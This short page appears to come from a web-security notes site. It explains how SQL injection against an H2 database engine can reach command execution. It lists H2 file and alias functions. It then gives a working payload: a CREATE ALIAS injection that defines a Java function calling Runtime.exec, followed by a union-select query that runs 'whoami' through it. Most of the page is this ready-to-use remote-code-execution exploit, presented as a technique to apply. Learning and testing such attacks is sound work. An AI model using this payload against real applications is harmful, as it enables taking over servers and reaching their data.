WEB

SQL Injection

H2 Database Exploit ALIAS Sql Injection (Java)

The H2 engine uses several defined functions and commands to interact with the database. The noteworthy ones are :

FILE_READ: Returns the contents of a file. (function)
FILE_WRITE: Write the supplied parameter into a file.(function)
CSVWRITE: Writes a CSV (comma separated values). (function)
CREATE ALIAS: Creates a new function alias. (command).

We can Create an Alias and then we Can Run our SQL Queries to exploit this Case Scenario

1'; CREATE ALIAS EXECVE AS 'String execve(String cmd) throws java.io.IOException { return new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter("\\A").hasNext() ? new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter("\\A").next() : ""; }'; --

after that you can do

1' union select 1,2,execve('whoami')-- # this should get executed

PreviousSignUp Page NextRegex Bypass

Last updated 7 months ago